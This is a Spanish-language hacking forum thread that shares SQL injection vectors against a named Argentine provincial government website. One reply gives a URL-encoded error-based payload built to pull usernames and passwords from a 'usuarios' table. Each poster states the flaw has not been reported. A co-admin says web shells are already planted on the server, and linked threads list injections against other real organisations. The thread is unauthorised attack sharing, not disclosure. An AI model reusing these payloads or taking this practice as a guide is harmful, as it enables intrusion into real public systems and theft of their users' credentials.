send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

SQLI http://www.vialidad.gba.gov.ar/

  • 3 Respuestas
  • 1124 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« en: Junio 27, 2013, 06:31:25 pm »


SQLI
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login() limit 1,1--%20-c
Reportado: No
« Última modificación: Enero 10, 2015, 01:15:06 pm por Expermicid »

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado eldb22

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Julio 21, 2013, 03:13:55 pm »
¡Buenisimo! Pero no pude sacarle jugo a ese vector, todavia me falta aprender bastante de SQLi. Pero encontré otro:

Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login*%29,concat%280x7c,%28select%20concat%28usuario,0x7c,0x636f6e74726173651f61%29%20from%20usuarios%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20%23
Reportado: no

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1881
  • Actividad:
    23.33%
  • Reputación 14
    • Ver Perfil
« Respuesta #2 en: Julio 21, 2013, 06:35:23 pm »
No sé si lo sabias o no, pero ya hay shells ahi...

Url: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fijate a la derecha salen muchos archivos en php, pues si le das al iconito verde entras a ese archivo, muchos están eliminados pero otros no.

Un saludo :)



Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #3 en: Julio 25, 2013, 02:24:55 am »
Si sabia que había shell, pero queria compartir el sqli que encontre, y q de hecho parece no estar reportado, ni por mi ni por los que subieron shell

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 722
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1111
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 1675
Último mensaje Junio 02, 2017, 06:39:33 am
por baah
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1006
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
SQLI Direccion de Bienestar Fuerza Aerea Argentina

Iniciado por hdbreaker

Respuestas: 4
Vistas: 1851
Último mensaje Noviembre 26, 2012, 12:05:50 pm
por alexander1712